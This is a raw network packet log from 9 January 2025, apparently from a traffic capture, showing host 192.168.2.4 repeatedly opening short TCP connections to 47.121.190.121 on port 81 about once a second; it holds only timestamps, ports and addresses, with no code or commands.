Jan 9, 2025 23:07:45.505723953 CET	81	49774	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:45.505749941 CET	49774	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.505779982 CET	49774	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.505888939 CET	49774	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.510747910 CET	81	49774	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:45.624602079 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.629713058 CET	81	49775	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:45.629836082 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.629949093 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:45.634906054 CET	81	49775	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:46.595709085 CET	81	49775	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:46.595840931 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.596745014 CET	81	49775	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:46.596817970 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.702363014 CET	49775	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.702696085 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.707489967 CET	81	49775	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:46.707621098 CET	81	49776	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:46.707743883 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.708103895 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:46.712959051 CET	81	49776	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:47.676652908 CET	81	49776	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:47.676716089 CET	81	49776	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:47.676742077 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.676773071 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.676887989 CET	49776	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.681730032 CET	81	49776	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:47.782130957 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.787403107 CET	81	49777	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:47.787483931 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.787604094 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:47.792443037 CET	81	49777	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:48.736531019 CET	81	49777	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:48.736821890 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.736850977 CET	81	49777	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:48.736917973 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.861072063 CET	49777	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.861329079 CET	49778	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.866064072 CET	81	49777	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:48.866187096 CET	81	49778	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:48.866270065 CET	49778	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.866396904 CET	49778	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:48.871246099 CET	81	49778	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:49.843429089 CET	81	49778	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:49.843497992 CET	81	49778	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:49.843677998 CET	49778	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:49.843796015 CET	49778	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:49.848629951 CET	81	49778	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:49.968846083 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:49.973877907 CET	81	49779	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:49.976613998 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:49.976809978 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:49.981719017 CET	81	49779	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:50.958440065 CET	81	49779	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:50.958499908 CET	81	49779	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:50.958534002 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:50.958595037 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:50.958730936 CET	49779	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:50.963555098 CET	81	49779	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:51.078135014 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:51.083422899 CET	81	49780	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:51.083584070 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:51.083826065 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:51.088815928 CET	81	49780	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:52.036262035 CET	81	49780	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:52.036310911 CET	81	49780	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:52.036441088 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.036441088 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.036595106 CET	49780	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.041491985 CET	81	49780	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:52.156629086 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.161850929 CET	81	49781	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:52.162005901 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.168386936 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:52.173258066 CET	81	49781	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:53.106275082 CET	81	49781	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:53.106340885 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.106348038 CET	81	49781	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:53.106389999 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.106463909 CET	49781	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.111284971 CET	81	49781	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:53.218489885 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.223536968 CET	81	49782	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:53.223654985 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.223790884 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:53.228566885 CET	81	49782	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:54.162743092 CET	81	49782	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:54.162802935 CET	81	49782	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:54.162833929 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.162935972 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.165952921 CET	49782	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.170722008 CET	81	49782	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:54.297044039 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.302166939 CET	81	49784	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:54.302234888 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.302391052 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:54.307158947 CET	81	49784	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:55.246228933 CET	81	49784	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:55.246288061 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.246345043 CET	81	49784	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:55.246419907 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.358669996 CET	49784	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.359000921 CET	49786	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.364545107 CET	81	49784	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:55.364943981 CET	81	49786	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:55.365046024 CET	49786	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.365223885 CET	49786	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:55.370013952 CET	81	49786	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:59.704018116 CET	49786	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:59.828619957 CET	49812	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:59.833431005 CET	81	49812	47.121.190.121	192.168.2.4
Jan 9, 2025 23:07:59.833492994 CET	49812	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:59.833643913 CET	49812	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:07:59.839220047 CET	81	49812	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:00.819166899 CET	81	49812	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:00.819190025 CET	81	49812	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:00.819303036 CET	49812	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:00.819498062 CET	49812	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:00.824336052 CET	81	49812	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:00.937057972 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:00.941942930 CET	81	49818	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:00.942039967 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:00.942228079 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:00.947165012 CET	81	49818	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:01.886778116 CET	81	49818	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:01.886868954 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:01.886959076 CET	81	49818	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:01.887011051 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:01.887095928 CET	49818	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:01.891832113 CET	81	49818	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:02.061089993 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:02.065884113 CET	81	49825	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:02.065937996 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:02.066632986 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:02.071407080 CET	81	49825	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:03.011859894 CET	81	49825	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:03.011918068 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.012178898 CET	81	49825	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:03.012223959 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.127492905 CET	49825	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.127805948 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.132572889 CET	81	49825	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:03.132919073 CET	81	49835	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:03.132981062 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.133083105 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:03.138703108 CET	81	49835	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:04.069070101 CET	81	49835	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:04.069128036 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.069180012 CET	81	49835	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:04.069221973 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.171092987 CET	49835	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.171500921 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.176702976 CET	81	49835	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:04.177213907 CET	81	49841	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:04.177295923 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.177412987 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:04.182991028 CET	81	49841	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:05.131822109 CET	81	49841	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:05.132015944 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.132035017 CET	81	49841	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:05.132110119 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.233963013 CET	49841	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.234276056 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.238771915 CET	81	49841	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:05.239370108 CET	81	49850	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:05.239435911 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.239620924 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:05.244407892 CET	81	49850	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:06.217329025 CET	81	49850	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:06.217454910 CET	81	49850	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:06.217497110 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.217531919 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.217650890 CET	49850	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.222666025 CET	81	49850	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:06.330219030 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.335212946 CET	81	49857	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:06.335310936 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.335422993 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:06.340193987 CET	81	49857	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:07.289119959 CET	81	49857	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:07.289243937 CET	81	49857	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:07.289304018 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.289304018 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.289351940 CET	49857	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.295383930 CET	81	49857	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:07.406022072 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.410850048 CET	81	49864	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:07.410952091 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.416624069 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:07.421483040 CET	81	49864	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:08.357172012 CET	81	49864	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:08.357258081 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.357428074 CET	81	49864	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:08.357486010 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.468224049 CET	49864	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.468539000 CET	49871	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.473367929 CET	81	49864	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:08.473566055 CET	81	49871	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:08.473628044 CET	49871	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.473718882 CET	49871	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:08.478457928 CET	81	49871	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:12.425225019 CET	81	49871	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:12.425288916 CET	81	49871	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:12.425545931 CET	49871	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:12.425753117 CET	49871	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:12.430573940 CET	81	49871	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:12.548361063 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:12.553503990 CET	81	49898	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:12.555079937 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:12.555202961 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:12.560076952 CET	81	49898	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:13.507934093 CET	81	49898	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:13.508030891 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.508099079 CET	81	49898	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:13.508229017 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.508359909 CET	49898	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.513181925 CET	81	49898	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:13.690079927 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.695003033 CET	81	49906	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:13.695086002 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.698776960 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:13.703692913 CET	81	49906	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:14.642699957 CET	81	49906	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:14.642760992 CET	81	49906	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:14.642770052 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.642798901 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.642935991 CET	49906	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.647721052 CET	81	49906	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:14.749553919 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.754602909 CET	81	49915	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:14.754684925 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.754780054 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:14.759932995 CET	81	49915	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:15.695023060 CET	81	49915	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:15.695113897 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.695270061 CET	81	49915	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:15.695353985 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.796524048 CET	49915	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.797816992 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.801359892 CET	81	49915	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:15.803009987 CET	81	49922	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:15.803067923 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.803208113 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:15.808007956 CET	81	49922	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:16.763417959 CET	81	49922	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:16.763456106 CET	81	49922	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:16.763535023 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.763535023 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.764689922 CET	49922	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.769505024 CET	81	49922	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:16.874892950 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.879861116 CET	81	49928	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:16.880001068 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.880197048 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:16.884979010 CET	81	49928	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:17.823348999 CET	81	49928	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:17.823544979 CET	81	49928	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:17.823581934 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.823632956 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.823664904 CET	49928	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.828639984 CET	81	49928	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:17.939845085 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.945077896 CET	81	49936	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:17.945202112 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.945480108 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:17.950356960 CET	81	49936	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:18.882231951 CET	81	49936	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:18.882359028 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:18.882529974 CET	81	49936	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:18.882592916 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:18.999388933 CET	49936	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:18.999711990 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:19.004656076 CET	81	49936	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:19.004693985 CET	81	49942	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:19.004754066 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:19.004863977 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:19.009586096 CET	81	49942	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:19.957854986 CET	81	49942	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:19.957963943 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:19.958038092 CET	81	49942	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:19.958096027 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:20.062026978 CET	49942	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:20.062625885 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:20.066867113 CET	81	49942	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:20.067523003 CET	81	49952	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:20.067610979 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:20.067790031 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:20.073503017 CET	81	49952	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:21.012429953 CET	81	49952	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:21.012473106 CET	81	49952	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:21.012535095 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.012535095 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.012835979 CET	49952	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.018243074 CET	81	49952	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:21.126662970 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.133579969 CET	81	49959	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:21.136312962 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.136523962 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:21.143553019 CET	81	49959	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:22.085259914 CET	81	49959	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:22.085328102 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.085506916 CET	81	49959	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:22.085563898 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.204552889 CET	49959	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.204952955 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.209352016 CET	81	49959	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:22.209693909 CET	81	49967	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:22.209881067 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.209881067 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:22.214729071 CET	81	49967	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:23.145281076 CET	81	49967	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:23.145391941 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.145595074 CET	81	49967	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:23.145638943 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.266799927 CET	49967	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.267151117 CET	49976	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.271657944 CET	81	49967	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:23.272097111 CET	81	49976	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:23.272162914 CET	49976	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.272284985 CET	49976	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:23.276993990 CET	81	49976	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:24.207060099 CET	81	49976	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:24.207189083 CET	81	49976	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:24.207380056 CET	49976	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:24.207495928 CET	49976	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:24.213656902 CET	81	49976	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:24.346767902 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:24.351598978 CET	81	49982	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:24.351694107 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:24.351865053 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:24.356781006 CET	81	49982	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:25.305530071 CET	81	49982	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:25.305638075 CET	81	49982	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:25.305701971 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:25.305701971 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:25.439867020 CET	49982	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:25.444638014 CET	81	49982	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:25.600703955 CET	49993	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:08:25.605597973 CET	81	49993	47.121.190.121	192.168.2.4
Jan 9, 2025 23:08:25.605814934 CET	49993	81	192.168.2.4	47.121.190.121
